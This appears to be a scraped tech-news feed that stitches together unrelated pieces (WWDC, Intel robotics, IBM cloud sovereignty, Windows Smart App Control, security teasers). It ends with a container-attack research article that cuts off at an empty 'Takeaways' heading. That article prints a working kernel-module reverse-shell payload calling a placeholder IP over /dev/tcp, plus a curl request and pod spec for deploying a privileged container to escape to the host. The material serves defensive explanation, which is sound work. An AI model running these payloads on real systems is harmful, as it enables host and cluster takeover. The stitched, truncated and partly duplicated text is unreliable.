Kategorie

Apple will open the doors to developers at its Worldwide Developer Conference (WWDC) next week. Beyond a big push on AI and new OSes focused on stability and performance, what should developers expect? Mostly it’s about new APIs, Foundation Models, and App Intents; here’s what I’ve been able to figure out so far.

Foundation Models

Apple has been building new Apple Intelligence APIs. One way it is achieving this is to take models made with Google Gemini, then distill and shrink them to fit inside (and run on) its devices. The progression will be to introduce these as a new crop of Foundation models developers can use in their apps. There’s more:

• New APIs mean developers will be able to run Apple Intelligence tools such as summarization directly on the customer device, all offline, all private.
• Developers that use Apple’s standard text editing/entry views will gain access to improved Apple-developed tools inside their apps without custom-coding.
• Because intelligence takes place on the user’s device, neither developers nor users will need to pay for those AI tokens. This is a distinct cost and privacy-saving advantage for customers and developers.

App Intents: The next generation

Apple continues on its quest to convince developers to make features of their apps available for use via Siri with App Intents. Doing so requires developers to wrap their apps into semantic structures, enabling speech/text-based interaction. To help them achieve this, Apple is expected to introduce a complete redesign of its App Intents framework.

Speak as you wish

While users must say “Hey Siri” to invoke its attention today, the assistant will respond more dynamically to natural language. Combined with App Intents, that means users should be able to ask Siri to use a combination of apps to make things happen on the device.

A developer might build a travel app that can take an itinerary and hand it across to a budgeting tool, for example. The idea is that with a spoken or typed command, a person will be able to call on a collection of apps to identify the destination, create an itinerary, put together a to-do list, prepare relevant letters or emails, and assemble a budget — all invoked by the original command.

What about context?

We’re expecting Siri to become better at using the content of your screen, location, and other personal data as it seeks to provide more contextualized responses. We don’t yet know the extent or form in which Apple will make that information available to third-party developers to help contextualize their own apps. Apple’s focus on privacy matters a great deal, as does its relationship with regulators, some of whom will demand that data made available to Apple’s own apps be made available to third-party apps. These are important matters for Apple, app developers, and customers who want the convenience of AI without loss of privacy.

More consistent UI tools on Swift

Swift should get better at migrating legacy code, but the big speculation around it concerns Liquid Glass. Will Swift make it easier for developers to build consistent user interfaces that work properly across all Apple’s platforms? If it does, then it will help overcome one of the big criticisms of Apple’s liquid-inspired UI. Swift will also usher in the tools developers need to support agentic application coding.

Better vibes for Xcode

Vibe coding is everywhere, including within Xcode, which is expected to gain improved contextual and predictive understanding to help boost developer productivity. Xcode could also  introduce improved real-time architectural debugging hints, aiming to make it easier for developers to build bug-free apps.

A Mac you can wear: Vision OS

All the AI enhancements made available across Apple’s other products will also be offered to visionOS. That access takes the headset another step closer to becoming the Mac you wear like sunglasses.

Elsewhere

• A new Camera API means developers can build specialized, interactive buttons that users can deploy directly within the native iOS Camera interface. This should be a great way to use more sophisticated camera apps more naturally.
• Wallet Pass means apps will be able to ingest things like barcodes or gym passes for use within Wallet.
• Icon Composer might offer more tools designed to promote consistency.

Intel finally retires

Apple will abandon Intel support in macOS 27, which means developers will likely end support for legacy Intel applications in response.

After the gold rush

Once the lights go down on WWDC, Apple’s real test will be to see if its announcements help make AI useful, private, and affordable to developers and their customers. After all, if Apple gets AI right on a platform basis, it should be able to offer the kind of on-device intelligence no one else can match, at no charge to developers or users — a move that might yet kick-start AI innovation across its platforms. This will provide a moat around the Apple ecosystem, inside which developers can explore new potentials for AI to give customers the tools they need at costs they can afford.

You can follow me on social media! Join me on BlueSky,  LinkedIn, Mastodon, and MeWe. 

Microsoft says an ongoing incident is preventing users of its Teams collaboration platform and Office for the web cloud-based productivity suite from opening files. [...]

Attackers are exploiting vulnerabilities faster than many organizations can identify and patch them. SecAlerts explains why faster vulnerability alerts can help reduce exposure and improve response times. [...]

Monday hit like a cron job with anger issues. A busted auth path here, a repo-side faceplant there, some "patched-ish" thing already getting chewed on in the wild, and then the usual bonus round: poisoned dev tools, sketchy forum chatter, phishing kits pretending to be productivity, and AI lowering the bar for people who already thought 'curl | sh' had a personality. The vibe is simple: old Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Intel is invading the physical AI space with a reentry into the robotics market it quit many years ago amid financial struggles.

The robotics strategy is part of the company’s larger plan to establish AI on the “edge,” in which devices have the computing capability to run AI locally. Many devices lack AI capabilities and have to offload processing to the cloud.

The chipmaker said its Intel Series 3 processors are now in 130 edge AI and robotics designs. It also had a design win with SensoryAI, which provides technology for robots that include Ella, a robotic barista made by Crown Digital.

The company’s Core Ultra Series 3 processors are derivatives of chip designs intended for laptops. But Intel has achieved a level of power efficiency for long battery life that allows those chips to be adapted for handheld devices and laptops.

Intel also said it can build advanced robotics chips thanks to its latest manufacturing technologies.

For example, many robotic functions, such as computer vision and real-time controls, can be integrated into a single chip. Previously, functions like graphics and movement and control were distributed among different cores in a chip.

SensoryAI, for example, has a chip architecture that provides the robotic barista — which is more like a robotic arm — with AI capabilities, Intel said.

The main “Avatar” agent handles customers as the main “Ella” agent reasons and executes the task. If Ella encounters errors, it passes on the issue to a Guardian agent, which helps with the recovery. Some issues could include making sense of an order, or cups that might be stuck. 

The three agents are embedded in a single piece of Core Ultra Series 3 silicon.

Intel is displaying some of those robots at the Computex trade show in Taiwan. The company shared a video of a humanoid-style robot from the floor in a X.com post  

This is not Intel’s first attempt at the robotics market. Intel sold robotics chips and kits when it was a dominant chip player in the field, but curtailed efforts in 2021 after Pat Gelsinger took over as CEO and restructured the company to focus on manufacturing.

Robotics is now back on the menu under new Intel CEO Lip-Bu Tan, who replaced Gelsinger last year. He has restructured to company to focus on high-growth areas that can generate high returns.

A Morgan Stanley study last year indicated the robotics market could be worth $5 trillion by 2050 — and more than 1 billion humanoid robots could be in operation. 

Robots are seen to improve human productivity and manufacturing output. For example, they could help factories that are facing labor shortages or be used to complete tasks that are dangerous. 

However, challenges remain. There isn’t yet enough real-world data to train robots to do targeted work. And the AI models — generally called world models — they will need are still under development. 

Training robots to do a specific job requires a sequence of events to happen in succession without any errors. Companies are still training robots to spot and understand errors, analyze possible resolutions, and take the right corrective action.

The Centre for Cybersecurity Belgium (CCB), the country's national authority for cybersecurity, warned on Friday that threat actors are now exploiting a recently patched critical Windows Netlogon vulnerability in attacks. [...]

Network incidents are often detected quickly, but investigations and coordination can delay resolution. Join our webinar tomorrow to learn how automation and AI-assisted workflows can help IT teams accelerate incident response. [...]

IBM has launched a tool designed to help customers assess cloud-sovereignty risks and meet regulatory compliance requirements. 

The Sovereignty Risk Profile launch comes as digital sovereignty becomes a higher priority for organizations concerned about where data is stored and processed. According to an IBM survey, 93% of executives believe sovereignty needs to be part of their business strategy.  

Via the new tool, customers can set up policies related to regulatory and business requirements — such as where data resides and how it’s protected, for instance. These policies can be applied to specific cloud workloads, regions, or zones in the Sovereignty Risk Profile tool, allowing users to track sovereignty requirements “in real time,” IBM Cloud product manager Janet Van said in a blog post, with “visibility into configurations, encryption posture, and environmental controls.” 

It’s then possible to assess compliance and decide what workloads meet sovereignty requirements. 

Tracking the factors that contribute to sovereignty is a challenge for many organizations, said Holger Mueller, vice president and principal analyst at Constellation Research. “It is very difficult, as you don’t know about the details of the stacks; sometimes, even the location of data is not fully transparent,” he said.

The Sovereignty Risk Profile “addresses many of the compliance-related requirements associated with data residency and encryption, while also tackling sovereignty from a resilience and concentration-risk perspective,” said Dario Maisto, senior analyst at Forrester.

However, the monitoring tool can only do so much to address digital sovereignty concerns, he said. While it can help organizations identify and report on potential issues, it “does not help [make] clients more or less sovereign, per se: it has only the potential to tell that a sovereignty problem is there.”

Broader questions around digital sovereignty remain difficult to address, he said, as there’s no universally accepted definition of the concept and limited legislation to establish clear requirements. 

Mueller described a spectrum of sovereignty issues that depend on factors such as whether data is stored, processed, and backed up in a customer’s own country, as well as whether staff that operate the data are domestic nationals. “Then there is the sovereignty of the software supply chain — but here everybody is dependent,” he said.

To further complicate matters, while several US hyperscalers sell sovereign-branded cloud services to European customers — with local staff and infrastructure —  concerns remain about the potential for extra-jurisdictional access to data, due to the US CLOUD Act and the US Foreign Intelligence Surveillance Act (FISA).

The Sovereignty Risk Profile is available within IBM’s Security and Compliance Center Workload Protection. It’s the latest in a range of IBM Cloud products aimed at addressing customers’ sovereignty concerns, including the recently launched IBM Sovereign Core software platform. 

A new cyber espionage campaign codenamed Operation Dragon Weave has been observed targeting officials and citizens in the Czech Republic and Taiwan to deliver an AdaptixC2 agent. According to Seqrite Labs, targets of the campaign include government, research, academic, technology, and financial services sectors. The activity entails distributing spear-phishing emails containing ZIP attachments Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Microsoft is working to address an ongoing incident preventing customers from setting up multi-factor authentication (MFA) or accessing the My Sign-Ins platform. [...]

Microsoft is working to address an ongoing incident preventing customers from setting up multi-factor authentication (MFA) or accessing the My Sign-Ins platform. [...]

Three years ago, the practical question for an MSP building a cybersecurity practice was which "vCISO platform" to buy. The term was good shorthand for the work at the time: assessments, advisory, reporting, maybe a compliance module bolted on the side. The work has since outgrown the descriptor. A Security Growth Platform is the more precise name for what MSPs and MSSPs need from the [email protected]

In the ever-evolving cybersecurity landscape, Microsoft has introduced various new features in Windows 11 designed to protect users from modern workplace threats. Among such features, Smart App Control (SAC) changes how Windows devices handle, and occasionally block, unwanted or potentially malicious applications.

But what exactly is Smart App Control? How does it work, who benefits most, and are there any caveats? In this story we’ll share some history and explain why SAC has been something of a stealth feature in Windows 11.

What is Smart App Control?

Smart App Control is a security feature in Windows 11 designed to block untrusted or potentially dangerous applications from running on a PC. Built directly into the operating system (through Windows Security), SAC leverages code signing, Microsoft’s intelligence cloud, and artificial intelligence to make real-time decisions about whether an app or application should be allowed to run. Its goal is to minimize the risk that malware, ransomware, and unwanted software could run on users’ systems — with minimal user intervention.

At its heart, Smart App Control is a kind of gatekeeper. When you attempt to run an app, SAC evaluates its trustworthiness. That evaluation is based on numerous criteria: Is the app digitally signed? Is it widely used and recognized as safe by Microsoft’s threat intelligence network? Has it been flagged previously for questionable behavior?

If an app fails one or more such checks and is found suspicious or untrustworthy, SAC blocks its execution, silently preventing a potential security event before it starts.

How does Smart App Control work?

SAC operates using a combination of cloud-based intelligence, local analysis, and digital signatures. Here’s a step-by-step breakdown of how it functions:

• App verification: When a user attempts to launch an application, SAC inspects the file. It first checks if the app is digitally signed by a trusted publisher, an important indicator of legitimacy.
• Cloud intelligence search: SAC then consults Microsoft’s extensive security databases in the cloud. These aggregate threat data from millions of Windows devices worldwide. If the app has been flagged already or is recognized as part of any malware campaign, it is blocked.
• AI-based analysis: For less clear-cut instances, SAC uses AI to evaluate an app’s behavior. That is, it looks for telltale signs of malware or unwanted code. Such a dynamic analysis helps catch emerging threats not yet known to the cloud.

When an app is blocked, the user gets a clear, informative notification. Usually, there’s no way to override SAC’s decision, which puts security ahead of convenience. It also ensures that users will quickly report false positives.

Smart App Control is designed to be simple and automatic. Unlike conventional antivirus or endpoint security, it requires no updates to definitions, nor manual scans. SAC works behind the scenes to block threats in real time. Because it uses both local and cloud-based intelligence, it’s always current.

On the downside, some legitimate apps, especially older or custom business software, may not be digitally signed, resulting in false positives. If SAC decides an app is unsafe, the only way to run the app is to turn SAC off.

Working with Smart App Control

Notably, Smart App Control is enabled by default — but only on “clean installs” of Windows 11 version 22H2 or later. Systems upgraded from older versions of Windows 11 will always show SAC in the “Off” state.

Microsoft made this decision to avoid potential compatibility issues with legacy or line-of-business applications. That means users can’t benefit from SAC unless they have a newer PC or somebody reinstalls Windows 11 from scratch on an older one. (See my Windows clean install tutorial for complete instructions.)

SAC prerequisites

To get granular: SAC requires that the following be present as Windows 11 comes up for the first time:

• Secure Boot, a security feature that allows only trusted, digitally signed software to run as Windows boots up
• A working chain of trust, including current CA-2023 boot certificates in Unified Extensible Firmware Interface (UEFI) and a CA-2023 compliant bootloader

Newer PCs — namely, those built in 2018 or later, with Windows 10 or 11 installed prior to delivery — routinely include UEFI-only boot and support Secure Boot from the get-go. Indeed, Secure Boot was introduced with Windows 8, and the original certificates came along in 2011 (Production PCA 2011, UEFI CA 2011, and KEK CA 2011). They’ve been shipped in firmware ever since.

As long as such machines get updated through Windows Update (or some managed equivalent, such as Microsoft Intune, Windows Autopilot, or Microsoft Configuration Manager), the new certificates and a proper chain of trust should be established on those PCs. (See FAQ: What you need to know about expiring Windows Secure Boot certificates for more information.) All this said, only Windows 11 imposes a working Secure Boot environment as a hard and fast system requirement as of 2021.

In short, Secure Boot and the chain of trust provide the essential foundation for SAC to start with a clean bill of health, security wise, and keep things that way. To learn more about Secure Boot and its various certificates and trappings, consult the Secure Boot and Windows Secure Boot Key Creation and Management Guidance pages on Microsoft Learn.

Modes of operation

SAC has three distinct modes:

• On: SAC actively monitors and blocks untrusted apps.
• Evaluation: SAC quietly observes your usage patterns and system needs before fully activating.
• Off: SAC is disabled and will not intervene.

SAC will normally start in Evaluation mode for up to a month, then turn itself On or Off depending on observed system behavior. Once turned on, SAC cannot be set back into Evaluation mode. Organizations or users who run custom software or specialized workflows should leave SAC in Evaluation mode to ensure that business functions keep working.

To check SAC’s status:

1. Open the Windows Security app.
2. Navigate to App & browser control.
3. Look for the “Smart App Control” section. You’ll see the current status: On, Off, or Evaluation mode, as shown in Figure 1.

Figure 1: On this PC, the evaluation period is over and Smart App Control is enabled.

Ed Tittel / Foundry

Until recently, SAC could not be toggled off and on again — once it was turned off, you had to reinstall or reset Windows 11 to re-enable it. But with the April 2026 Patch Tuesday release of Windows 11 (KB5083769), admins and elevated users can turn SAC on or off as they see fit, as long as the initial setup conditions described above are met.

This toggling capability is a step forward for usability and safety, because it lets users with administrative privileges temporarily disable SAC in order to install, update, or uninstall certain unsigned apps, such as those that rely on Windows Installer Transform (MST) files, and then turn SAC back on immediately.

Note that this feature is being gradually rolled out, so you may not have access to it yet.

Smart App Control compared to other Windows 11 protections

Microsoft has long offered security features like Windows Defender, Controlled Folder Access, and Application Control. SAC differs in its general, automated approach. Rather than relying on static definitions, group policies, or user input, SAC leverages real-time intelligence and AI.

In many ways, SAC takes the best bits of Application Control (previously available through Device Guard and Windows Defender Application Control) and makes them accessible to a wider audience. It also involves little or no manual setup and few, if any, policy issues. Then again, as covered earlier in the story, SAC also functions as a black box: one either lives with its judgments, or does without it.

Real-world impact and industry reception

Feedback from the IT community has been mostly positive. Security researchers note SAC’s ability to block emerging threats before traditional antivirus solutions can respond. But SAC is hardly bullet-proof: a number of studies cite focused exploits or workarounds to bypass or trick SAC. For instance, Elastic Security Labs documented multiple techniques to break SAC in 2021, with follow-ons from Hacker News and TechRadar.

As always, a proactive approach to cybersecurity that includes teaching users to avoid trouble remains a key ingredient in establishing and maintaining a strong security posture.

For end users, SAC’s presence may go largely unnoticed — until, that is, it intercepts a malicious download or prevents installation of a suspicious or malicious program. Or, as the case may sometimes be, when users try to run old, unsigned software that SAC won’t allow.

Tips for IT administrators

For IT professionals considering deploying devices with SAC, certain best practices are worth implementing:

• Test SAC in Evaluation mode before rolling out widely, especially if your organization relies on custom or legacy software, or if anything important is unsigned.
• Educate users about SAC’s presence and purpose so they understand why certain apps may be blocked. Set up a procedure to request support and/or fixes, particularly if important software gets blocked. Possible workarounds include restricted VMs with SAC turned off to run unsigned applications.
• Maintain an up-to-date inventory of critical applications and ensure as many as possible are digitally signed by trusted publishers.
• Monitor Microsoft resources Learn, Support, and Answers forums for SAC updates, compatibility lists, and troubleshooting tips.

The future of Smart App Control

As threats continue to evolve, Microsoft should continue to expand SAC’s capabilities. Undoubtedly it will use more advanced AI models and deeper integration with Windows Defender and Microsoft 365 security. Future updates may introduce more granular controls for enterprise environments, including managed exceptions and better reporting tools.

For now, SAC represents a useful additional tool for Windows security. It’s intended to shift the balance in favor of the good guys in the ongoing war against malware. So far, it’s been a modest step forward. But it’s not unthinkable that SAC could offer more and better protection in upcoming Windows releases.

[Also see: FAQ: What you need to know about expiring Windows Secure Boot certificates]

This article was originally published in September 2025 and updated in June 2026.

Microsoft has resolved a known issue causing installation failures and 0x800f0922 errors when deploying the May 2026 Windows 11 security update (KB5089549). [...]

Introduction

Modern infrastructures universally rely on containerization to deploy applications, scale services, and build cloud platforms. The use of Docker, Kubernetes, and similar technologies has become the corporate standard for efficient automation. However, as containers grow in popularity, so does the interest of malicious actors — a trend we actively track in our research into advanced cyberthreats. For instance, in one of its recent attacks, the APT group TeamPCP compromised Checkmarx KICS across multiple attack chains for different vectors. This included poisoning a Docker Hub repository to later steal Kubernetes secrets and other sensitive data. The tainted images distributed a stealer that was loaded during the KICS scanning process.

Today, attacks on container environments have evolved into full-fledged, multi-stage scenarios involving supply chain compromises, Kubernetes secrets theft, orchestration API abuse, and container escape attempts. This article examines the primary container attack vectors that retain top relevance today.

Principles of containerization

A container is an isolated code execution environment, designed to partition resources so applications can run correctly and independently. Unlike a virtual machine, a container uses the single underlying kernel of the host operating system.

To isolate the environment, a container uses a distinct process namespace and a virtual file system. Container resources are capped and shared with the host system. This container isolation is built on top of Linux kernel features such as namespaces, cgroups, capabilities, and seccomp.

Compromising a container can help attackers achieve their objectives on the host system itself. Below, we examine the current vectors relevant to container implementation architecture and infrastructure.

Current attack vectors

The primary and most critical attack vectors targeting container environments that are actively exploited by malicious actors include:

• Exploiting vulnerabilities in the host system and container runtime components
• Malicious activity inside a compromised container
• Container escape followed by host compromise
• Exploiting misconfigurations and the insecure use of containerization and orchestration APIs
• Supply chain attacks, including container image poisoning and CI/CD pipeline compromise

Each of these vectors can be utilized either independently or as part of a complex, multi-stage attack chain. In practice, attackers rarely stop at compromising a single container; their primary objective is often to gain access to the Kubernetes cluster, secrets management systems, or other mission-critical environment components. This is why securing container infrastructure requires a comprehensive approach that spans configuration auditing, runtime protection, activity monitoring, and software supply chain security. Let’s take a closer look at each of these vectors.

Exploiting host system vulnerabilities

Because a container does not have its own isolated OS, vulnerabilities affecting the Linux kernel or runtime components remain just as critical when exploited from within a container.

Any vulnerability that allows for privilege escalation, arbitrary code execution, or isolation bypassing can potentially be leveraged by an attacker once the container is compromised. Successful exploitation of these flaws can lead to a container escape, compromise of the Kubernetes node or the entire cluster, lateral movement across the infrastructure, secrets theft, and malicious actions potentially culminating in a complete service disruption. It is worth noting that the mere presence of a vulnerability does not always guarantee a compromise, as exploitation sometimes requires specific configuration settings or privileges to work.

Below are examples of several vulnerabilities leveraged in attacks on container environments:

• CVE-2019-5736 is one of the most prominent and illustrative vulnerabilities associated with containerization. It affected the runC runtime environment and allowed an attacker, who already had root access inside the container, to execute arbitrary code on the host system with root privileges. The root cause of the vulnerability was runC’s improper handling of the file descriptor for its own executable via the /proc/self/exe mechanism. When a container was started, the runC process temporarily executed within the container’s context while remaining a host system process. This allowed an attacker to gain access to the runC binary and overwrite its contents.
• CVE-2022-0492 is a critical Linux kernel vulnerability that allows for container escape and arbitrary command execution on the host system. The flaw stemmed from improper privilege validation when interacting with the cgroups release_agent mechanism. This vulnerability posed a particular risk for container infrastructures because it allowed an attacker who already possessed code execution capabilities inside a container to break out of isolation and gain control of the host system.
• CVE-2024-21626 is a critical vulnerability in runC that allowed an attacker to access the host file system from within a container, and in specific scenarios, even perform a complete container escape. The root cause of the issue was runC’s improper handling of file descriptors and the process’ current working directory when spinning up containers or executing commands via docker exec or similar mechanisms.

Malicious actions inside the container

Sometimes, an attacker does not need to exploit complex attack chains involving container escapes, Kubernetes cluster compromise, or lateral movement to achieve their goals. In many cases, the container itself already houses data and resources that are highly valuable to the attacker. For example, a container may contain:

• User and service credentials
• API keys
• Access tokens
• SSH keys
• Environment variables containing secrets
• Kubernetes ServiceAccount tokens
• Configuration files
• Application service data or databases

These types of data are especially prone to exposure due to configuration mistakes or specific operational processes. For instance, secrets might be passed via environment variables, baked into Docker images during the build phase, or mounted directly inside the container. In Kubernetes environments, automatically mounted ServiceAccount tokens are of particular interest to attackers, as they provide a direct pathway to interact with the Kubernetes API.

Even a single compromised container frequently provides an attacker with sufficient leverage for next steps: gaining access to external services, compromising cloud infrastructure, stealing user data, impersonating a trusted service, or establishing persistence within the environment. Beyond data theft, malicious actors can use a compromised container as a staging ground for further malicious activity. This is why securing container infrastructure is about much more than just preventing escapes. Even a fully isolated container, if it houses sensitive data or holds access to internal services, can become a major foothold for an infrastructure breach.

In the context of this vector, approaches and techniques applicable not only to container environments but also to traditional systems are frequently applied. Once an attacker gains access to a container, they usually find themselves in a full-featured Linux environment, allowing them to deploy standard post-exploitation, reconnaissance, and persistence methods.

We explored container configuration errors and other unsafe practices that attackers could exploit to carry out malicious activities in more detail in this article.

Container escape

Container escape is one of the most dangerous and prevalent attack vectors targeting container infrastructure. The term refers to the bypassing of container isolation, allowing an attacker to directly interact with the host system.

The opportunity to escape a container can arise from a multitude of sources: the exploitation of vulnerabilities, container misconfigurations, or the insecure use of containerization and orchestration APIs. Indeed, container escape is the logical conclusion of most attacks on container infrastructure, as the attacker’s ultimate goal is frequently to break out of the isolated environment and gain access to the host system or the broader Kubernetes cluster. As such, container escape ties together a significant portion of the attack vectors discussed in this article. In practice, misconfigurations remain one of the most common root causes of successful container escapes, as they occur far more frequently than the exploitation of complex vulnerabilities. With that in mind, we will take a closer look at container misconfigurations and their associated attack scenarios below.

To better understand the risks associated with container misconfigurations, let’s explore the concept of capabilities in Linux systems. This is a mechanism for granularly granting extended permissions to processes, allowing them to perform privileged actions without needing full root access.

Privileged containers

One of the most dangerous configurations is running a container with the --privileged flag. In this mode, the container is granted all Linux capabilities, direct access to host devices, and the ability to interact with kernel interfaces. A container configured this way virtually ceases to be an isolated environment and, in many cases, possesses capabilities comparable to root access on the host system.

Let’s look at a basic example of a container escape attack involving the --privileged flag. Using the capsh utility, you can see that such a container possesses virtually all Linux capabilities. Furthermore, if the PID namespace matches the host’s, the process with PID=1 corresponds to init, the first system process in Linux. In a different configuration, PID 1 would belong to the process that created the container. If we spawn a shell from the init process using the nsenter utility, the expected behavior is the creation of a process outside the container, which can easily be verified by using the hostname command.

Container privilege misconfigurations open up a broad attack surface. Let’s dive deeper into how specific capabilities can be used to execute a container escape.

CAP_SYS_ADMIN

CAP_SYS_ADMIN is considered one of the most dangerous Linux capabilities in the context of container security. Although Linux capabilities were originally intended to break down superuser privileges into discrete categories, over time, CAP_SYS_ADMIN became a catch-all for a massive number of sensitive kernel operations. As a result, a container granted this capability gains access to a wide array of system mechanisms that directly impact container isolation. It inherits the ability to mount file systems, interact with the cgroups mechanism responsible for resource allocation, modify kernel parameters within certain limits, work with loop devices, and utilize various namespace management features. In practice, this heavily blurs the line between the container and the host system.

This capability becomes especially dangerous when combined with other configuration errors. For instance, if the container is configured to use the hostPath parameter, an attacker can leverage a container compromise to mount the host system’s directories right into their own environment and access critical host files. Similarly, having access to /proc or /sys allows for direct interaction with internal Linux kernel mechanisms, which can drastically expand the blast radius of the breach.

Let’s look at a clear example of how having CAP_SYS_ADMIN can help an attacker escape a container. Illustrated below is the sequence of actions inside a container possessing CAP_SYS_ADMIN privileges and access to host directories. By mounting the host’s disk to a folder inside the container, the attacker can freely interact with all files on the host system. In this specific example, it shows the ability to overwrite the root user’s shell configuration by injecting an arbitrary malicious payload.

CAP_SYS_MODULE

CAP_SYS_MODULE provides direct access to the kernel module loading and unloading mechanism. This direct interaction with kernel space makes CAP_SYS_MODULE a high-risk capability, unlike many other capabilities that are restricted purely to user space.

From a Linux architectural standpoint, kernel modules consist of code executing with maximum privileges inside kernel space. These modules can extend system functionality, manage devices, handle the network stack, interface with file systems, and control other mission-critical components. This is why the ability to dynamically load these modules via CAP_SYS_MODULE equates to having the power to manipulate the behavior of the entire operating system.

In practice, modern containerized applications rarely require CAP_SYS_MODULE. The presence of this capability is typically tied to legacy architectures, monitoring systems, or specialized drivers that must interact directly with the kernel. This is why CAP_SYS_MODULE is almost universally banned in modern infrastructures. In most environments, it is considered an unacceptable risk because its compromise does not just lead to localized privilege escalation within the container, but to code execution directly in kernel space.

A container escape using this capability happens in several stages. The goal of the attack in this case is to load a malicious Linux kernel module. It is worth noting that the module must match the specific kernel version in use, requiring the attacker to perform additional reconnaissance to identify it. These attacks can be executed entirely within the container if it contains the necessary build tools to compile the module and has access to kernel dependency directories. However, because these utilities are typically stripped from container images, attackers usually compile the malicious payload with the required dependencies on an external host. They then either transfer it over the network or drop it into a binary file on the target by using a command like echo.

Let’s look at a container escape using a kernel module with the following payload example:

#include <linux/kmod.h> #include <linux/module.h> MODULE_LICENSE("Test"); MODULE_AUTHOR("Test"); MODULE_DESCRIPTION("reverse shell module"); MODULE_VERSION("1.0"); char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/<IP>/<Port> 0>&1", NULL}; static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; static int __init reverse_shell_init(void) { return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit);

Upon loading, this module triggers the reverse shell. Once the payload is built and successfully delivered to the container, all the attacker needs to do is start a listener on the IP address and port specified in the payload, and then load the module into kernel space.

CAP_SYS_PTRACE

The CAP_SYS_PTRACE capability grants a process elevated permissions to interact with other system processes via the ptrace system call. While it is designed for debugging and code tracing, its misconfiguration in containerized environments can severely weaken isolation and, under certain conditions, enable a container escape leading to host system compromise.

The primary risk of CAP_SYS_PTRACE is that it allows a process to read and modify the memory of other processes, control their execution, inject code, and extract sensitive data directly from memory. Furthermore, CAP_SYS_PTRACE enables process injection techniques.

If a container is compromised, an attacker can use ptrace to attach to host processes. Crucially, this is only possible if the host’s PID namespace is shared with the container — this is configured via hostPID: true. This configuration allows the attacker to target a process running on the host, inject code, and trigger a reverse shell — though in most cases, this requires additional malicious code. The image below demonstrates this kind of an attack, implemented using a publicly available PoC.

CAP_NET_ADMIN

CAP_NET_ADMIN provides extensive privileges to manage the network stack of a Linux system. If a container is compromised, the presence of this capability significantly weakens network isolation and creates additional opportunities for further exploitation.

A container equipped with CAP_NET_ADMIN can modify network interface configurations, manipulate routing tables, interact with traffic filtering mechanisms, and alter the behavior of the network stack. Although most of these operations are formally restricted to the container’s own network namespace, in practice, this capability is frequently combined with other misconfigurations — such as the hostNetwork: true parameter — which grants direct access to the host’s network resources.

Once inside the container, an attacker can leverage this capability to modify its network behavior and launch further attacks across the infrastructure. One of the most common scenarios involves manipulating iptables rules to redirect traffic. This enables man-in-the-middle (MitM) attacks, allowing the attacker to intercept internal traffic or mask their own malicious activities.

It is important to emphasize that there are many other Linux capabilities that can lead to a container escape when combined with specific misconfigurations; we have highlighted only a few of the most severe and frequently encountered.

Exploitation of orchestration APIs

One of the most dangerous and common attack vectors in containerized infrastructure is the exploitation of misconfigured container management and orchestration APIs. Unlike attacks that require complex kernel vulnerability exploits or container escape, this scenario is often remarkably straightforward: the attacker simply needs to gain access to the control interfaces of the container environment.

The fundamental risk stems from the fact that container platform APIs possess inherent administrative privileges over the entire infrastructure. The Docker API, Kubernetes API, and kubelet API are designed to spin up containers, modify configurations, access host file systems, and execute commands inside running containers. When misconfigured, these interfaces immediately become a point of failure for the entire environment.

One of the most notorious examples of this vector is an exposed Docker API. If the Docker daemon is accessible over TCP without TLS or authentication, an attacker can remotely interact with the host system with permissions equivalent to a local administrator. They can deploy new containers custom-configured for attacks, mount the host’s entire root file system, and execute arbitrary commands within any container via the API. In practice, compromising an unauthenticated Docker API typically leads to a complete host takeover after just a few API requests.

Similar risks exist within Kubernetes environments. The Kubernetes API server acts as the central control point for the entire cluster. If an attacker manages to compromise a ServiceAccount token, exploit weak RBAC policies, or discover an inadvertently exposed API server, they can execute a broad spectrum of destructive operations.

For the sake of this attack example, let us assume that an attacker has compromised a Kubernetes API token for a privileged account. First, they enumerate the token’s permissions, typically by running a script to query each individual capability. This gives them a full list of Kubernetes privileges.

The script’s output reveals that the compromised API token grants exceptionally high privileges within the cluster. The logical next step in the attack chain is to deploy a malicious, privileged container to execute any of the host escape techniques described above. In our example, the attacker used a curl POST request to the API to create the container:

curl -k -X POST https://<kubernetes-url>/api/v1/namespaces/default/pods -H "Authorization: Bearer <Token>" -H "Content-Type: application/json" -d @pod.json

The configuration passed in the pod.json file is explicitly designed to enable an escape:

{ "apiVersion": "v1", "kind": "Pod", "metadata": { "name": "privileged-pod-from-api" }, "spec": { "containers": [ { "name": "debug-container", "image": "ubuntu:latest", "command": ["sleep", "3600"], "securityContext": { "privileged": true } } ] } }

Once the privileged container is deployed, the attacker can execute an escape to compromise the underlying host system.

However, this is not the only high-risk scenario involving API requests. For instance, when a Docker socket is mounted inside a container, an attacker gains the ability to interact with the Docker daemon directly. Once that container is compromised, the attacker effectively inherits the privileges of the daemon, which means they gain control over all containers on the host.

To execute the attack, adversaries look for containers with mounted sockets. The further progression of the attack replicates what has been described above: an API request is made to create a privileged container, after which any escape method is similarly exploited using the API.

Supply chain attacks

Unlike classic attacks aimed at exploiting vulnerabilities in already deployed containers, this approach focuses on compromising components before they are even launched in the runtime environment. Modern container infrastructure is tightly integrated with a large number of external components. As a result, container security directly depends not only on the application itself, but on the entire image build and delivery chain. Compromising any of these stages potentially allows an attacker to inject malicious code into multiple containers and services simultaneously.

One of the most common scenarios involves attacks that contaminate container images. In many organizations, developers use public images from Docker Hub or other available sources without a full verification of their origin or contents. Threat actors frequently publish contaminated images that masquerade as popular services and utilities. Once a container like that is launched within the infrastructure, the attacker gains the ability to execute their own code right inside the organization’s trusted environment.

Furthermore, CI/CD container deployment systems are among the most frequent targets of these attacks. Application build and delivery platforms typically possess elevated privileges. For instance, after gaining access to a CI/CD system, an attacker can covertly modify the Docker image build stages. Instead of altering the application’s source code, the attacker can inject the malicious logic directly into the pipeline itself. An additional command during the build process can download a third-party binary, add a hidden script, modify the container configuration, or implant a remote management mechanism. Externally, the container will look completely legitimate because its core functionality remains unchanged.

Takeaways

